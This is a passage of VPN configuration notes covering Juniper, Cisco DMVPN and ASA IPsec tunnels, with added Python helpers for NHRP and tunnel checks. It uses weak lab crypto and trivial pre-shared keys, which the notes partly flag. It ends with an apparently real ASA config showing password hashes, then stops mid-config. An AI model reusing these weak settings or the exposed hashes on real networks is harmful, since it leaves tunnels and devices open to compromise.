set security ipsec vpn ido-gkm ike ipsec-policy ido-gkm
set security ipsec vpn ido-gkm establish-tunnels immediately
set interfaces st0 unit 14 family inet mtu 1384 (the unit must match bind-interface st0.14 above)
set interfaces st0 unit 14 family inet address 5.5.5.1/30
R2;
set security ike policy sirketi2topcular mode main
set security ike policy sirketi2topcular proposal-set standard
set security ike policy sirketi2topcular pre-shared-key ascii-text Juniper
set security ike gateway sirketi2topcular ike-policy sirketi2topcular
set security ike gateway sirketi2topcular address 87.109.68.183
set security ike gateway sirketi2topcular external-interface pp0.0
set security ipsec policy sirketi2topcular proposal-set standard
set security ipsec vpn sirketi2topcular bind-interface st0.1
set security ipsec vpn sirketi2topcular vpn-monitor optimized
set security ipsec vpn sirketi2topcular ike gateway sirketi2topcular
set security ipsec vpn sirketi2topcular ike ipsec-policy sirketi2topcular
set security ipsec vpn sirketi2topcular establish-tunnels immediately
set interfaces st0 unit 1 family inet mtu 1384
set interfaces st0 unit 1 family inet address 5.5.5.2/30
(proposal-set standard negotiates 3DES or AES-128 with SHA-1 and DH group 2; for a new tunnel define your own proposals with AES-256, SHA-256 and group 14 or higher. Not shown here: each st0 unit must be added to a security zone, and security policies plus static routes for the remote LANs via the st0 next hop are still required, otherwise the tunnel comes up but carries no traffic.)
Hub and Spoke Dynamic VTI (the hub clones a virtual-access interface from the virtual template for every spoke that connects, so it needs no per-spoke tunnel configuration)
HUB;
crypto isakmp policy 1
hash sha
encr 3des
authentication pre-share
group 2
life 86400
!
crypto keyring ALIkeyring
pre-shared-key address 0.0.0.0 0.0.0.0 key 0 SIFRE (wildcard: any peer that knows SIFRE is accepted, and one leaked spoke key compromises the whole hub; with many spokes use certificates, or at least one keyring entry per spoke address)
!
crypto ipsec transform-set ALI esp-3des esp-sha-hmac
!
crypto ipsec profile ALIprofile
set transform-set ALI
!
crypto isakmp profile ALIprofile
keyring ALIkeyring
match identity address 0.0.0.0
virtual-template 1
!
interface Loopback0
ip address 100.0.1.1 255.255.255.0
!
interface Virtual-Template1 type tunnel
ip unnumbered Loopback0
tunnel mode ipsec ipv4
tunnel protection ipsec profile ALIprofile
!
router eigrp 1
network 10.0.0.0
network 100.0.0.0
no auto-summary
SPOKE1 (SPOKE2 has the same configuration with its own addresses)
crypto isakmp policy 1
hash sha
encr 3des
authentication pre-share
group 2
life 86400
!
crypto isakmp key SIFRE address 10.0.0.1
!
crypto ipsec transform-set ALI esp-3des esp-sha-hmac
!
crypto ipsec profile ALIprofile
set transform-set ALI
!
interface Loopback0
ip address 100.0.2.1 255.255.255.0
!
interface Tunnel0
ip unnumbered Loopback0
tunnel source 10.0.0.2
tunnel destination 10.0.0.1
tunnel mode ipsec ipv4
tunnel protection ipsec profile ALIprofile
!
router eigrp 1
network 10.0.0.0
network 100.0.0.0
no auto-summary
IPSEC DMVPN (multipoint GRE + NHRP + IPsec; Phase 3, with redirect on the hub and shortcut on the spokes)
HUB;
interface Loopback0
ip address 10.0.0.1 255.255.255.0
!
interface FastEthernet0/0
ip address 1.1.1.1 255.255.255.0
no shut
!
interface Tunnel0
ip address 192.168.1.1 255.255.255.0
ip mtu 1400
tunnel source 1.1.1.1
tunnel mode gre multipoint
ip nhrp network-id 1
no ip split-horizon eigrp 1
ip nhrp authentication 123 (NHRP authentication string; it is sent in cleartext and only prevents accidental mixing of DMVPN clouds, it is not a security control. IPsec is.)
ip nhrp map multicast dynamic
ip nhrp holdtime 600
ip nhrp redirect (Phase 3: when the hub forwards spoke-to-spoke traffic back out the same tunnel interface, it sends an NHRP redirect so the spokes build a direct tunnel)
!
router eigrp 1
network 10.0.0.1
network 192.168.0.0
no auto-summary
crypto isakmp policy 1
encryption 3des
hash sha
authentication pre-share
group 2
exit
crypto isakmp key 0 SIFRE address 0.0.0.0 0.0.0.0 (wildcard PSK: any host that knows SIFRE can join the DMVPN; use per-spoke keys or certificates in production)
!
crypto ipsec transform-set ALI esp-3des esp-sha-hmac
mode transport (transport mode is the norm for DMVPN: the mGRE outer header already carries the peer addresses, it saves 20 bytes, and it is required when spokes sit behind NAT)
!
crypto ipsec profile ALIprofile
set transform-set ALI
interface Tunnel0
tunnel protection ipsec profile ALIprofile
SPOKE1;
interface Loopback0
ip address 10.0.1.1 255.255.255.0
!
interface FastEthernet0/0
ip address 1.1.1.2 255.255.255.0
no shut
!
interface Tunnel0
ip address 192.168.1.2 255.255.255.0
ip mtu 1400
ip nhrp authentication 123
tunnel source 1.1.1.2
tunnel mode gre multipoint
ip nhrp map 192.168.1.1 1.1.1.1 (static NHRP entry: the hub's tunnel address maps to its public address; spokes learn each other's mappings dynamically)
ip nhrp map multicast 1.1.1.1 (multicast, i.e. the EIGRP hellos, is replicated only towards the hub)
ip nhrp network-id 1
ip nhrp nhs 192.168.1.1 (the hub is the next-hop server; this is its tunnel address)
ip nhrp holdtime 600
ip nhrp registration timeout 100 (the spoke re-registers its tunnel/public mapping with the hub every 100 seconds; it must be shorter than the hub's holdtime of 600 or the mapping expires)
ip nhrp shortcut (Phase 3: on receiving a redirect from the hub, resolve the destination and install a direct spoke-to-spoke route)
router eigrp 1
network 10.0.1.0
network 192.168.1.0
no auto-summary
crypto isakmp policy 1
encryption 3des
hash sha
authentication pre-share
group 2
exit
crypto isakmp key 0 SIFRE address 0.0.0.0 0.0.0.0
!
crypto ipsec transform-set ALI esp-3des esp-sha-hmac
mode transport
!
crypto ipsec profile ALIprofile
set transform-set ALI
interface Tunnel0
tunnel protection ipsec profile ALIprofile
SPOKE2;
interface Loopback0
ip address 10.0.2.1 255.255.255.0
!
interface FastEthernet0/0
ip address 1.1.1.3 255.255.255.0
no shut
!
interface Tunnel0
ip address 192.168.1.3 255.255.255.0
ip mtu 1400
ip nhrp authentication 123
tunnel mode gre multipoint
ip nhrp map 192.168.1.1 1.1.1.1
ip nhrp map multicast 1.1.1.1
ip nhrp network-id 1
ip nhrp nhs 192.168.1.1
ip nhrp holdtime 600
ip nhrp registration timeout 100
tunnel source 1.1.1.3
ip nhrp shortcut (if you find any shortway , you can use it)
router eigrp 1
network 10.0.2.0
network 192.168.1.0
no auto-summary
crypto isakmp policy 1
encryption 3des
hash sha
authentication pre-share
group 2
exit
crypto isakmp key 0 SIFRE address 0.0.0.0 0.0.0.0
!
crypto ipsec transform-set ALI esp-3des esp-sha-hmac
mode transport
!
crypto ipsec profile ALIprofile
set transform-set ALI
interface Tunnel0
tunnel protection ipsec profile ALIprofile
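The NHRP behaviour that the hub and spoke commands above rely on, as an added example that is not part of the original notes. It models the hub's NHRP cache (filled by spoke registrations, aged by the holdtime), the hub's answer to a resolution request, and the spoke's forwarding decision in Phase 3: the first packet to a remote LAN goes via the hub, the redirect/shortcut pair installs a direct spoke-to-spoke mapping, and when a spoke stops re-registering its mapping expires and traffic falls back to the hub. The topology is constructed from the configuration above (hub public 1.1.1.1 / tunnel 192.168.1.1, spokes 1.1.1.2 and 1.1.1.3 with LANs 10.0.1.0/24 and 10.0.2.0/24); time is in simulation seconds and no packets are built.

```python
"""NHRP registration, resolution and Phase 3 shortcuts as the DMVPN configuration above uses them.
Added example with a constructed topology; it models the NHRP cache and the forwarding decision only."""
import ipaddress
from dataclasses import dataclass, field


@dataclass
class Spoke:
    tunnel_ip: str
    nbma: str                                        # public address = tunnel source
    lan: str                                         # prefix behind this spoke
    shortcuts: dict = field(default_factory=dict)    # lan prefix -> (peer nbma, expiry)


@dataclass
class Hub:
    nbma: str
    holdtime: int = 600                              # 'ip nhrp holdtime 600'
    registrations: dict = field(default_factory=dict)   # spoke tunnel ip -> (nbma, expiry)
    routes: dict = field(default_factory=dict)          # lan prefix -> spoke tunnel ip (EIGRP over the tunnel)

    def register(self, spoke, now):
        """'ip nhrp nhs' on the spoke: registers tunnel ip -> NBMA, refreshed every 'registration timeout'."""
        self.registrations[spoke.tunnel_ip] = (spoke.nbma, now + self.holdtime)
        self.routes[spoke.lan] = spoke.tunnel_ip

    def resolve(self, dst, now):
        """Answer a resolution request: (prefix, NBMA) of the spoke behind dst, or None if unknown or expired."""
        for prefix, tunnel_ip in self.routes.items():
            if ipaddress.ip_address(dst) in ipaddress.ip_network(prefix):
                nbma, expiry = self.registrations.get(tunnel_ip, (None, 0))
                return (prefix, nbma) if expiry > now else None
        return None


def forward(spoke, dst, hub, now):
    """NBMA address a spoke sends a packet for dst to: a shortcut peer if one is valid, else the hub."""
    for prefix, (nbma, expiry) in spoke.shortcuts.items():
        if ipaddress.ip_address(dst) in ipaddress.ip_network(prefix) and expiry > now:
            return nbma
    # No shortcut: the packet goes to the NHS. In Phase 3 the hub forwards it out the same mGRE
    # interface and sends a redirect ('ip nhrp redirect'); the spoke then resolves the destination
    # and installs a shortcut ('ip nhrp shortcut') that the following packets use.
    answer = hub.resolve(dst, now)
    if answer:
        prefix, nbma = answer
        spoke.shortcuts[prefix] = (nbma, now + hub.holdtime)
    return hub.nbma


def timers_ok(registration_timeout, holdtime):
    """A spoke must re-register before the hub's holdtime expires, or its mapping disappears."""
    return registration_timeout < holdtime


def build_lab():
    """The hub and two spokes from the configuration above (constructed topology)."""
    hub = Hub(nbma="1.1.1.1")
    spoke1 = Spoke("192.168.1.2", "1.1.1.2", "10.0.1.0/24")
    spoke2 = Spoke("192.168.1.3", "1.1.1.3", "10.0.2.0/24")
    return hub, spoke1, spoke2


if __name__ == "__main__":
    hub, spoke1, spoke2 = build_lab()
    hub.register(spoke1, now=0)
    hub.register(spoke2, now=0)
    print(forward(spoke1, "10.0.2.5", hub, now=10))    # 1.1.1.1: first packet goes via the hub
    print(forward(spoke1, "10.0.2.5", hub, now=11))    # 1.1.1.3: shortcut, spoke to spoke
    print(forward(spoke1, "10.0.2.5", hub, now=700))   # 1.1.1.1: spoke2 never re-registered
```

The last call shows why registration timeout 100 has to stay below holdtime 600: with no refresh the hub forgets spoke2 at t=600, the spoke1 shortcut expires with it, and the hub cannot answer the next resolution request, so traffic stays hub-and-spoke until spoke2 registers again.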
ASA
Cisco ASA Site-to-Site IKEv2 IPSEC VPN
We will use the following topology for this example:
ASA1 and ASA2 are able to reach each other through their “OUTSIDE” Ethernet 0/1 interfaces. Their Ethernet 0/0 interfaces are the “INSIDE” where we have R1 and R2. The goal is to configure IKEv2 IPSEC site-to-site VPN between ASA1 and ASA2 so that R1 and R2 are able to reach each other.
Configuration
IKEv2 Policy Configuration
First we will configure the IKEv2 policy, which is similar to phase 1 of IKEv1. Here's what it looks like (identical on both ASA firewalls):
ASA1(config)# crypto ikev2 policy 10
ASA1(config-ikev2-policy)# encryption aes
ASA1(config-ikev2-policy)# group 2
ASA1(config-ikev2-policy)# prf sha
ASA1(config-ikev2-policy)# lifetime seconds 86400
The configuration is similar to the IKEv1 policy; the only new command is prf sha. The PRF is the pseudo-random function IKEv2 uses to derive keying material. It is negotiated separately from the integrity algorithm, although both are SHA-1 in this example.
IKEv2 IPSEC Proposal
This section is similar to phase 2 of IKEv1 where we have to configure a transform set. For IKEv2 we call this the IPSEC proposal, which is configured identically on both ASAs:
ASA1(config)# crypto ipsec ikev2 ipsec-proposal MY_PROPOSAL
ASA1(config-ipsec-proposal)# protocol esp encryption aes
ASA1(config-ipsec-proposal)# protocol esp integrity sha-1
We will use ESP, AES as the encryption algorithm and SHA for integrity. Next step is to configure an access-list that defines what traffic we will encrypt:
ASA1(config)# access-list LAN1_LAN2 extended permit ip host 192.168.1.1 host 192.168.2.2
ASA2(config)# access-list LAN2_LAN1 extended permit ip host 192.168.2.2 host 192.168.1.1
Now we have to configure a crypto map that combines the access-list, remote peer and IKEv2 proposal together:
ASA1(config)# crypto map MY_CRYPTO_MAP 1 match address LAN1_LAN2
ASA1(config)# crypto map MY_CRYPTO_MAP 1 set peer 10.10.10.2
ASA1(config)# crypto map MY_CRYPTO_MAP 1 set ikev2 ipsec-proposal MY_PROPOSAL
ASA1(config)# crypto map MY_CRYPTO_MAP interface OUTSIDE
ASA2(config)# crypto map MY_CRYPTO_MAP 1 match address LAN2_LAN1
ASA2(config)# crypto map MY_CRYPTO_MAP 1 set peer 10.10.10.1
ASA2(config)# crypto map MY_CRYPTO_MAP 1 set ikev2 ipsec-proposal MY_PROPOSAL
ASA2(config)# crypto map MY_CRYPTO_MAP interface OUTSIDE
The crypto map is called "MY_CRYPTO_MAP" and it specifies the access-list, remote peer and the IKEv2 proposal. It has been attached to the OUTSIDE interface.
The next step is to configure a tunnel group. This is where we define authentication and the pre-shared-key:
ASA1(config)# tunnel-group 10.10.10.2 type ipsec-l2l
ASA1(config)# tunnel-group 10.10.10.2 ipsec-attributes
ASA1(config-tunnel-ipsec)# ikev2 local-authentication pre-shared-key CISCO123
ASA1(config-tunnel-ipsec)# ikev2 remote-authentication pre-shared-key CISCO456
ASA2(config)# tunnel-group 10.10.10.1 type ipsec-l2l
ASA2(config)# tunnel-group 10.10.10.1 ipsec-attributes
ASA2(config-tunnel-ipsec)# ikev2 local-authentication pre-shared-key CISCO456
ASA2(config-tunnel-ipsec)# ikev2 remote-authentication pre-shared-key CISCO123
Above we configured the remote peer and the IPSEC type (lan to lan). IKEv2 allows us to use different authentication methods for each peer. In this example I used a different pre-shared key for each peer; note that the local key on ASA1 is the remote key on ASA2 and vice versa. Keys like CISCO123 are lab values only; use long random pre-shared keys or certificates. The last step is to enable IKEv2 on the interface:
ASA1(config)# crypto ikev2 enable OUTSIDE
ASA2(config)# crypto ikev2 enable OUTSIDE
This takes care of the IKEv2 configuration. Don't forget to configure routing so that ASA1 and ASA2 know how to reach each other's INSIDE interfaces:
ASA1(config)# route OUTSIDE 192.168.2.0 255.255.255.0 10.10.10.2
ASA2(config)# route OUTSIDE 192.168.1.0 255.255.255.0 10.10.10.1
This completes the configuration. Let's see if it works.
Verification
Generate some traffic between R1 and R2 so that the ASA firewalls have to establish the IPSEC tunnel. First we'll check if we have an IKEv2 security association:
ASA1# show crypto isakmp sa
There are no IKEv1 SAs
IKEv2 SAs:
Session-id:1, Status:UP-ACTIVE, IKE count:1, CHILD count:1
Tunnel-id Local Remote Status Role
7658533 10.10.10.1/500 10.10.10.2/500 READY INITIATOR
Encr: AES-CBC, keysize: 128, Hash: SHA96, DH Grp:2, Auth sign: PSK, Auth verify: PSK
Life/Active Time: 86400/22 sec
Child sa: local selector 192.168.1.1/0 - 192.168.1.1/65535
remote selector 192.168.2.2/0 - 192.168.2.2/65535
ESP spi in/out: 0x99589369/0xfcd7e620
This is looking good, a security association has been established between ASA1 and ASA2. Let's check if traffic is encrypted:
ASA1# show crypto ipsec sa
interface: OUTSIDE
Crypto map tag: MY_CRYPTO_MAP, seq num: 1, local addr: 10.10.10.1
access-list LAN1_LAN2 extended permit ip host 192.168.1.1 host 192.168.2.2
local ident (addr/mask/prot/port): (192.168.1.1/255.255.255.255/0/0)
remote ident (addr/mask/prot/port): (192.168.2.2/255.255.255.255/0/0)
current_peer: 10.10.10.2
#pkts encaps: 4, #pkts encrypt: 4, #pkts digest: 4
#pkts decaps: 4, #pkts decrypt: 4, #pkts verify: 4
#pkts compressed: 0, #pkts decompressed: 0
#pkts not compressed: 4, #pkts comp failed: 0, #pkts decomp failed: 0
#pre-frag successes: 0, #pre-frag failures: 0, #fragments created: 0
#PMTUs sent: 0, #PMTUs rcvd: 0, #decapsulated frgs needing reassembly: 0
#TFC rcvd: 0, #TFC sent: 0
#Valid ICMP Errors rcvd: 0, #Invalid ICMP Errors rcvd: 0
#send errors: 0, #recv errors: 0
local crypto endpt.: 10.10.10.1/500, remote crypto endpt.: 10.10.10.2/500
path mtu 1500, ipsec overhead 74(44), media mtu 1500
PMTU time remaining (sec): 0, DF policy: copy-df
ICMP error validation: disabled, TFC packets: disabled
current outbound spi: FCD7E620
current inbound spi : 99589369
inbound esp sas:
spi: 0x99589369 (2572718953)
transform: esp-aes esp-sha-hmac no compression
in use settings ={L2L, Tunnel, IKEv2, }
slot: 0, conn_id: 4096, crypto-map: MY_CRYPTO_MAP
sa timing: remaining key lifetime (kB/sec): (4193279/28737)
IV size: 16 bytes
replay detection support: Y
Anti replay bitmap:
0x00000000 0x0000001F
outbound esp sas:
spi: 0xFCD7E620 (4242007584)
transform: esp-aes esp-sha-hmac no compression
in use settings ={L2L, Tunnel, IKEv2, }
slot: 0, conn_id: 4096, crypto-map: MY_CRYPTO_MAP
sa timing: remaining key lifetime (kB/sec): (3962879/28737)
IV size: 16 bytes
replay detection support: Y
Anti replay bitmap:
0x00000000 0x00000001
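The two outputs above are what you read by hand; the script below, an added example that is not code from the original post, does the same reading mechanically so it can run after every change. The two sample outputs are constructed from the values quoted above (trimmed to the lines the checks use). The check encodes what a practitioner looks for: IKE SA READY, a child SA present, the same SPIs in both views, packets counted in both directions (encaps without decaps is the classic one-way tunnel caused by a non-mirrored ACL or a routing problem on the far side), no errors, and a warning on parameters that are accepted but weak (DH group 2 and HMAC-SHA1-96, as negotiated here). The group-14 floor and the SHA96 reading are this example's assumptions, not anything the output itself states.

```python
"""Read the two ASA 'show' outputs and decide whether the tunnel is healthy.

Added example, not code from the original post. SHOW_ISAKMP_SA and
SHOW_IPSEC_SA are constructed from the verification output quoted above.
"""
import re

SHOW_ISAKMP_SA = """\
IKEv2 SAs:
Session-id:1, Status:UP-ACTIVE, IKE count:1, CHILD count:1
Tunnel-id Local Remote Status Role
7658533 10.10.10.1/500 10.10.10.2/500 READY INITIATOR
Encr: AES-CBC, keysize: 128, Hash: SHA96, DH Grp:2, Auth sign: PSK, Auth verify: PSK
Child sa: local selector 192.168.1.1/0 - 192.168.1.1/65535
remote selector 192.168.2.2/0 - 192.168.2.2/65535
ESP spi in/out: 0x99589369/0xfcd7e620
"""

SHOW_IPSEC_SA = """\
Crypto map tag: MY_CRYPTO_MAP, seq num: 1, local addr: 10.10.10.1
#pkts encaps: 4, #pkts encrypt: 4, #pkts digest: 4
#pkts decaps: 4, #pkts decrypt: 4, #pkts verify: 4
#send errors: 0, #recv errors: 0
current outbound spi: FCD7E620
current inbound spi : 99589369
inbound esp sas:
transform: esp-aes esp-sha-hmac no compression
outbound esp sas:
transform: esp-aes esp-sha-hmac no compression
"""


def _num(pattern, text, base=10):
    m = re.search(pattern, text)
    return int(m.group(1), base) if m else None


def parse_ikev2(text):
    """Fields from 'show crypto isakmp sa' (IKEv2 section)."""
    sa = {}
    m = re.search(r"Status:(\S+), IKE count:(\d+), CHILD count:(\d+)", text)
    if m:
        sa["status"], sa["children"] = m.group(1), int(m.group(3))
    # the tunnel table row: id, local/port, remote/port, status, role
    m = re.search(r"^\d+\s+(\S+)/\d+\s+(\S+)/\d+\s+(\S+)\s+(\S+)\s*$", text, re.M)
    if m:
        sa["local"], sa["remote"], sa["state"], sa["role"] = m.groups()
    m = re.search(r"Encr: ([\w-]+), keysize: (\d+), Hash: (\w+), DH Grp:(\d+), Auth sign: (\w+)", text)
    if m:
        sa.update(encr=m.group(1), keysize=int(m.group(2)), hash=m.group(3),
                  dh=int(m.group(4)), auth=m.group(5))
    sa["spi_in"] = _num(r"ESP spi in/out: 0x([0-9a-fA-F]+)/", text, 16)
    sa["spi_out"] = _num(r"ESP spi in/out: 0x[0-9a-fA-F]+/0x([0-9a-fA-F]+)", text, 16)
    return sa


def parse_ipsec(text):
    """Counters, current SPIs and transforms from 'show crypto ipsec sa'."""
    return {
        "encaps": _num(r"#pkts encaps: (\d+)", text),
        "decaps": _num(r"#pkts decaps: (\d+)", text),
        "send_errors": _num(r"#send errors: (\d+)", text),
        "recv_errors": _num(r"#recv errors: (\d+)", text),
        "spi_out": _num(r"current outbound spi: ([0-9A-Fa-f]+)", text, 16),
        "spi_in": _num(r"current inbound spi\s*: ([0-9A-Fa-f]+)", text, 16),
        "transforms": re.findall(r"transform: (\S+ \S+)", text),
    }


def check_tunnel(ike, ipsec, expect_transform="esp-aes esp-sha-hmac", min_dh=14):
    """Return (healthy, problems, warnings). Problems mean traffic is not flowing
    correctly; warnings are parameter choices worth fixing on both peers."""
    problems, warnings = [], []
    if ike.get("status") != "UP-ACTIVE" or ike.get("state") != "READY":
        problems.append("IKEv2 SA is not established")
    if not ike.get("children"):
        problems.append("no child (IPsec) SA under the IKE SA")
    if (ike.get("spi_in"), ike.get("spi_out")) != (ipsec["spi_in"], ipsec["spi_out"]):
        problems.append("SPIs in the IKE and IPsec views disagree (stale SA?)")
    if not ipsec["encaps"]:
        problems.append("nothing encrypted: interesting traffic never matched the crypto map")
    elif not ipsec["decaps"]:
        problems.append("one-way tunnel: we encrypt but never decrypt (check the peer's ACL and routing)")
    if ipsec["send_errors"] or ipsec["recv_errors"]:
        problems.append("send/recv errors on the SA")
    for t in ipsec["transforms"]:
        if t != expect_transform:
            problems.append(f"unexpected transform {t!r}")
    # ASSUMPTION of this example: group 14 (2048-bit MODP) is the floor, SHA96 = HMAC-SHA1-96
    if ike.get("dh", 0) < min_dh:
        warnings.append(f"DH group {ike.get('dh')} is below group 14 (2048-bit MODP)")
    if ike.get("hash") == "SHA96":
        warnings.append("integrity is HMAC-SHA1-96; prefer SHA-256 (or AES-GCM) on both peers")
    return (not problems, problems, warnings)


if __name__ == "__main__":
    ok, problems, warnings = check_tunnel(parse_ikev2(SHOW_ISAKMP_SA), parse_ipsec(SHOW_IPSEC_SA))
    print("healthy" if ok else "BROKEN", problems, warnings)
```

On the output quoted above the tunnel is reported healthy with two warnings (DH group 2, SHA1-96); zeroing the decaps counter in the sample turns it into the one-way finding, which is the state you most often see when only one side's crypto ACL was written correctly.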
ASA TO Cisco Router IPSEC VPN
ASA:
interface GigabitEthernet0/0
 no shutdown
 ip address 10.10.10.1 255.255.255.0
 security-level 100
 nameif inside
interface GigabitEthernet0/1
 no shutdown
 ip address 203.200.200.2 255.255.255.252
 security-level 0
 nameif outside
route outside 0 0 203.200.200.1
crypto ikev1 policy 1
 authentication pre-share
 encryption 3des
 hash sha
 group 2
 lifetime 86400
crypto ipsec ikev1 transform-set MY_SET esp-3des esp-md5-hmac
crypto map VPN 1 set security-association lifetime seconds 86400
crypto map VPN 1 set pfs
object-group network Local
 network-object host 10.10.10.10
object-group network Remote
 network-object host 172.16.20.10
access-list ACL-PERMIT extended permit ip object-group Local object-group Remote
tunnel-group 117.168.100.2 type ipsec-l2l
tunnel-group 117.168.100.2 ipsec-attributes
 ikev1 pre-shared-key Cisco123
crypto map VPN 1 match address ACL-PERMIT
crypto map VPN 1 set peer 117.168.100.2
crypto map VPN 1 set ikev1 transform-set MY_SET
crypto map VPN interface outside
crypto ikev1 enable outside
Verification on the ASA:
show vpn-sessiondb detail l2l filter ipaddress 117.168.100.2
Cisco Router
interface FastEthernet0/0
 no shutdown
 ip address 172.16.20.1 255.255.255.0
interface FastEthernet0/1
 no shutdown
 ip address 117.168.100.2 255.255.255.252
ip route 0.0.0.0 0.0.0.0 117.168.100.1
crypto isakmp policy 1
 authentication pre-share
 encryption 3des
 hash sha
 group 2
 lifetime 86400
crypto ipsec transform-set MY-SET esp-3des esp-md5-hmac
ip access-list extended ACL-PERMIT
 permit ip host 172.16.20.10 host 10.10.10.10
crypto isakmp key 0 Cisco123 address 203.200.200.2
crypto map VPN 1 ipsec-isakmp
 set peer 203.200.200.2
 set transform-set MY-SET
 set pfs group2
 set security-association lifetime seconds 86400
 match address ACL-PERMIT
interface FastEthernet0/1
 crypto map VPN
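Every line of the router config above has a counterpart on the ASA, and an IKEv1 site-to-site tunnel only comes up when those counterparts agree: same phase 1 policy, same ESP transform, same PFS group, peer addresses that point at each other, the same pre-shared key bound to the right address, and crypto ACLs that are exact mirror images. The script below, an added example and not code from the original post, parses both halves and reports every disagreement before you ever type `show crypto session`. The two configs are constructed from the ASA and router snippets above; the one assumption (labelled in the code) is that the ASA's bare `set pfs` is equivalent to the `set pfs group2` the router side states explicitly.

```python
"""Cross-check the ASA and IOS halves of an IKEv1 L2L tunnel.

Added example, not code from the original post. ASA_CONFIG and IOS_CONFIG are
constructed from the two snippets above.
"""
import re
from collections import defaultdict

ASA_CONFIG = """\
interface GigabitEthernet0/0
 ip address 10.10.10.1 255.255.255.0
 nameif inside
interface GigabitEthernet0/1
 ip address 203.200.200.2 255.255.255.252
 nameif outside
crypto ikev1 policy 1
 authentication pre-share
 encryption 3des
 hash sha
 group 2
 lifetime 86400
crypto ipsec ikev1 transform-set MY_SET esp-3des esp-md5-hmac
crypto map VPN 1 set pfs
object-group network Local
 network-object host 10.10.10.10
object-group network Remote
 network-object host 172.16.20.10
access-list ACL-PERMIT extended permit ip object-group Local object-group Remote
tunnel-group 117.168.100.2 type ipsec-l2l
tunnel-group 117.168.100.2 ipsec-attributes
 ikev1 pre-shared-key Cisco123
crypto map VPN 1 match address ACL-PERMIT
crypto map VPN 1 set peer 117.168.100.2
crypto map VPN 1 set ikev1 transform-set MY_SET
crypto map VPN interface outside
"""

IOS_CONFIG = """\
interface FastEthernet0/1
 ip address 117.168.100.2 255.255.255.252
crypto isakmp policy 1
 authentication pre-share
 encryption 3des
 hash sha
 group 2
 lifetime 86400
crypto ipsec transform-set MY-SET esp-3des esp-md5-hmac
ip access-list extended ACL-PERMIT
 permit ip host 172.16.20.10 host 10.10.10.10
crypto isakmp key 0 Cisco123 address 203.200.200.2
crypto map VPN 1 ipsec-isakmp
 set peer 203.200.200.2
 set transform-set MY-SET
 set pfs group2
 match address ACL-PERMIT
interface FastEthernet0/1
 crypto map VPN
"""


def blocks(config):
    """Map each top-level line to its indented sub-lines (repeated headers merge)."""
    out, cur = defaultdict(list), None
    for raw in config.splitlines():
        if not raw.strip() or raw.startswith("!"):
            continue
        if raw[0].isspace():
            if cur is not None:
                out[cur].append(raw.strip())
        else:
            cur = raw.strip()
            out[cur]  # create the key even for lines with no children
    return out


def phase1(b, prefix):
    """Settings of the first IKE policy block whose header starts with prefix."""
    for h, lines in b.items():
        if h.startswith(prefix):
            d = {}
            for l in lines:
                k, _, v = l.partition(" ")
                d["encryption" if k == "encr" else k] = v   # IOS prints 'encr'
            return d
    return {}


def _first(lines, prefix, idx=2):
    return next((l.split()[idx] for l in lines if l.startswith(prefix)), None)


def asa_side(config):
    b = blocks(config)
    ifaces = {_first(v, "nameif", 1): _first(v, "ip address") for h, v in b.items() if h.startswith("interface")}
    mapname, ifname = re.search(r"^crypto map (\S+) interface (\S+)", config, re.M).groups()
    entry = lambda verb: re.search(rf"^crypto map {mapname} \d+ {verb} (\S+)", config, re.M).group(1)
    ts, acl, peer = entry("set ikev1 transform-set"), entry("match address"), entry("set peer")
    groups = {h.split()[2]: [l.split()[2] for l in v if l.startswith("network-object host")]
              for h, v in b.items() if h.startswith("object-group network")}
    flows = set()
    for m in re.finditer(rf"^access-list {acl} extended permit ip object-group (\S+) object-group (\S+)", config, re.M):
        flows |= {(s, d) for s in groups[m.group(1)] for d in groups[m.group(2)]}
    pfs = re.search(rf"^crypto map {mapname} \d+ set pfs(?: (\S+))?$", config, re.M)
    return {
        "phase1": phase1(b, "crypto ikev1 policy"),
        "local_ip": ifaces[ifname], "peer": peer, "key_for": peer,
        "transform": re.search(rf"^crypto ipsec ikev1 transform-set {ts} (.+)$", config, re.M).group(1).split(),
        "pfs": (pfs.group(1) or "group2") if pfs else None,   # ASSUMPTION: bare 'set pfs' == group2
        "psk": _first(b.get(f"tunnel-group {peer} ipsec-attributes", []), "ikev1 pre-shared-key"),
        "flows": flows,
    }


def ios_side(config):
    b = blocks(config)
    iface = next(v for h, v in b.items() if h.startswith("interface") and any(l.startswith("crypto map") for l in v))
    mapname = _first(iface, "crypto map")
    entry = next(v for h, v in b.items() if h.startswith(f"crypto map {mapname} "))
    ts, acl = _first(entry, "set transform-set"), _first(entry, "match address")
    key = re.search(r"^crypto isakmp key (?:0 )?(\S+) address (\S+)", config, re.M)
    return {
        "phase1": phase1(b, "crypto isakmp policy"),
        "local_ip": _first(iface, "ip address"), "peer": _first(entry, "set peer"),
        "transform": re.search(rf"^crypto ipsec transform-set {ts} (.+)$", config, re.M).group(1).split(),
        "pfs": _first(entry, "set pfs"), "psk": key.group(1), "key_for": key.group(2),
        "flows": {m.groups() for m in map(re.compile(r"permit ip host (\S+) host (\S+)").match,
                                          b[f"ip access-list extended {acl}"]) if m},
    }


def compare(asa, ios):
    """List everything that would stop phase 1 or phase 2 from negotiating."""
    issues = []
    if asa["phase1"] != ios["phase1"]:
        issues.append(f"phase 1 policy differs: {asa['phase1']} vs {ios['phase1']}")
    if asa["transform"] != ios["transform"]:
        issues.append(f"transform-set differs: {asa['transform']} vs {ios['transform']}")
    if asa["pfs"] != ios["pfs"]:
        issues.append(f"PFS differs: {asa['pfs']} vs {ios['pfs']}")
    if asa["peer"] != ios["local_ip"] or ios["peer"] != asa["local_ip"]:
        issues.append("peer addresses do not point at each other")
    if asa["psk"] != ios["psk"] or ios["key_for"] != asa["local_ip"]:
        issues.append("pre-shared key (or the address it is bound to) differs")
    if {(d, s) for s, d in asa["flows"]} != ios["flows"]:   # router ACL must be the ASA ACL reversed
        issues.append("crypto ACLs are not mirror images (phase 2 proxy-ID mismatch)")
    return issues


if __name__ == "__main__":
    print(compare(asa_side(ASA_CONFIG), ios_side(IOS_CONFIG)) or "both sides agree")
```

For the pair above the result is an empty list. Changing the router's transform to `esp-sha-hmac` or mistyping the key on one side is reported immediately, which is cheaper than reading `debug crypto isakmp` after the fact.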
Verification:
Router# show crypto session
ASA# show vpn-sessiondb detail l2l filter ipaddress 117.168.100.2
FULL CONFIGURATION
ASA
ASA Version 9.5(2)
!
hostname MES2-Tai-Firewall
enable password M11Bxq0F5IM3c3hp encrypted
passwd uoyK.nRXb41yBCX3 encrypted
names
!
interface GigabitEthernet0/0
 nameif ViaSat
 security-level 1
 ip address 10.51.22.2 255.255.255.252
!
interface GigabitEthernet0/1
 shutdown
 no nameif
 no security-level
 no ip address
!
interface GigabitEthernet0/2
